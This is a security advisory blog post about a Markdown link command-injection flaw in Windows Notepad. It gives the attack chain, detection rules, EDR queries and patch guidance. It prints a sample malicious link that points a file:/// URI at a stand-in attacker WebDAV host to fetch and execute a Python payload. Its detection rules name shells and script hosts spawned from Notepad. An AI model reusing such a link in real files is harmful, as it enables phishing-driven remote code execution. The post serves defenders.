Microsoft’s quest to modernize Notepad has backfired. The addition of Markdown support in 2025 introduced a command injection vulnerability that turns a simple text file into a remote code execution vector. One crafted link, one click, and an attacker owns your session.
CVE-2026-20841 was patched in February’s Patch Tuesday, but with multiple public PoCs and reports of exploitation attempts, defenders need to act fast.
The Vulnerability
CVE: CVE-2026-20841
CVSS: 8.8 (HIGH)
CWE: CWE-77 (Command Injection)
Affected: Windows Notepad (Microsoft Store version, not legacy notepad.exe)
Patched: February 10, 2026 (build 11.2510+)
The flaw exists in how Notepad’s Markdown rendering engine handles URL protocols. When processing links in Markdown files, Notepad doesn’t sanitize or restrict URI schemes. An attacker can craft a link using the file:/// protocol pointing to a WebDAV or SMB share, and Notepad will happily invoke the system’s protocol handler to fetch and execute the remote payload.
[Click here for important update](file:///\\attacker-webdav[.]com@5005\DavWWWRoot\payload.py)When a user Ctrl+Clicks that link in Notepad’s Markdown preview, Windows fetches the file from the WebDAV server and executes it. No download prompt. No SmartScreen warning for most file types. Just execution.
Attack Chain
- Attacker crafts malicious
.mdfile with embedded link - File delivered via email, Slack, Teams, Discord, or any file-sharing method
- Victim opens file in Windows Notepad
- Victim clicks the embedded link (Ctrl+Click in Markdown preview)
- Notepad invokes protocol handler for the
file:///URI - System connects to attacker-controlled WebDAV/SMB share
- Payload fetched and executed with victim’s privileges
The beauty of this attack from an adversary’s perspective: the “weapon” is a text file. It bypasses most email attachment filters. It looks innocuous. It exploits trust in a Microsoft-signed application that’s been shipping with Windows for 40 years.
Exploitation Nuances
Security researcher tangent65536’s PoC analysis reveals some important details:
- Most dangerous payload extensions (.exe, .lnk, .vbs) still trigger Windows’ built-in security warning
- If Python or Java is installed, .py and .jar payloads execute without warning dialogs
- The vulnerability is trivial to exploit but requires that one click
This means developer workstations with Python installed are prime targets. Given that developers routinely exchange README.md files and documentation, the social engineering bar is low.
Who’s Exploiting This
As of February 12, 2026, Microsoft officially rates exploitation as “less likely” with no confirmed in-the-wild attacks. However, WinBuzzer reported attack activity on February 11, and Feedly’s threat intelligence feed marked exploitation in the wild the same day.
The disconnect between Microsoft’s assessment and field reports is notable. Seven public PoCs appeared on GitHub within 24 hours of disclosure. The exploit is trivial to weaponize. Any moderately competent threat actor can integrate this into existing phishing campaigns.
Expected threat actor interest:
- Initial access brokers seeking new entry vectors
- Ransomware affiliates looking for developer-targeted attacks
- APT groups with interest in software supply chains (developer workstations are gold)
- Commodity malware distributors
The February 2026 Patch Tuesday also fixed six actively exploited zero-days, indicating heightened adversary activity against Windows infrastructure this month.
Detection Strategies
Snort Rules
Cisco Talos released detection rules in their February update:
Snort 2: 65895-65900, 65902, 65903, 65906-65911, 65913, 65914, 65923, 65924
Snort 3: 301395-301403
Vulnerability Scanners
- Qualys: Plugin 386526
- Nessus: Plugin 298646
Sigma Rule - Notepad Spawning Network Connections
title: Notepad.exe Suspicious Network Activity
id: 7e8f2a1c-4d3b-5e6f-8a9b-0c1d2e3f4a5b
status: experimental
description: Detects Notepad making outbound connections to WebDAV or SMB shares
author: Endolum Academy
date: 2026/02/12
references:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\notepad.exe'
DestinationPort:
- 445 # SMB
- 139 # NetBIOS
- 80 # WebDAV HTTP
- 443 # WebDAV HTTPS
Initiated: 'true'
condition: selection
falsepositives:
- Legitimate Notepad plugins (rare)
level: highSigma Rule - Notepad Spawning Suspicious Children
title: Notepad.exe Spawning Suspicious Child Process
id: 3c4d5e6f-7a8b-9c0d-1e2f-3a4b5c6d7e8f
status: experimental
description: Detects Notepad spawning processes commonly associated with payload execution
author: Endolum Academy
date: 2026/02/12
references:
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20841
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\notepad.exe'
Image|endswith:
- '\python.exe'
- '\pythonw.exe'
- '\java.exe'
- '\javaw.exe'
- '\powershell.exe'
- '\cmd.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\mshta.exe'
- '\rundll32.exe'
condition: selection
falsepositives:
- Legitimate automation (very rare for Notepad parent)
level: criticalYARA Rule - Malicious Markdown File
rule CVE_2026_20841_Malicious_Markdown {
meta:
description = "Detects Markdown files with suspicious WebDAV/SMB links"
author = "Endolum Academy"
reference = "CVE-2026-20841"
date = "2026-02-12"
strings:
$md_link = /\[.{1,100}\]\(file:\/\/\// ascii nocase
$webdav_pattern = /file:\/\/\/\\\\[a-zA-Z0-9\-\.]+@[0-9]+\\/ ascii nocase
$smb_pattern = /file:\/\/\/\\\\[a-zA-Z0-9\-\.]+\\[a-zA-Z0-9\-_]+\\/ ascii nocase
$davwww = "DavWWWRoot" ascii nocase
condition:
($md_link and ($webdav_pattern or $smb_pattern)) or
($md_link and $davwww)
}Network IOCs to Monitor
Watch for Notepad.exe (or its parent svchost/explorer context) connecting to:
- External IP addresses on ports 80, 443, 445, 139
- WebDAV URLs with
@portsyntax (e.g.,attacker[.]com@5005) - UNC paths to external hosts
- Any domain containing “DavWWWRoot” in the path
EDR Queries
Microsoft Defender for Endpoint (KQL):
DeviceNetworkEvents
| where InitiatingProcessFileName =~ "notepad.exe"
| where RemotePort in (80, 443, 445, 139)
| where RemoteIPType == "Public"
| project Timestamp, DeviceName, RemoteIP, RemotePort, RemoteUrlCrowdStrike (Spotlight):
event_platform=win event_type=ProcessRollup2
| search ParentBaseFileName="notepad.exe"
| search ImageFileName IN ("python.exe", "java.exe", "powershell.exe", "cmd.exe")Immediate Actions
- Patch Now - Update Windows Notepad via Microsoft Store to build 11.2510+
- Enable Auto-Updates - Ensure Microsoft Store apps update automatically
- Email Gateway - Consider blocking or quarantining .md attachments temporarily
- User Awareness - Warn users about clicking links in Markdown files
- Monitor - Deploy the Sigma rules above and hunt for historical activity
The Bigger Picture
CVE-2026-20841 is a symptom of Microsoft’s aggressive feature expansion without proportional security review. Notepad went from a 40KB text editor to a network-connected, AI-integrated productivity tool. Every new feature is new attack surface.
This vulnerability also highlights the trust problem with inbox apps. Users inherently trust applications signed by Microsoft and shipping with Windows. That trust is being weaponized.
The irony isn’t lost on anyone that this disclosure came days after Notepad++ revealed their update infrastructure was compromised by Chinese state-sponsored actors for months in 2025. Text editors are having a rough year.
Want to learn how to hunt for threats like this? Check out Endolum Academy’s ECDA (Endolum Certified Defense Analyst) certification, where we teach real-world detection engineering and threat hunting techniques.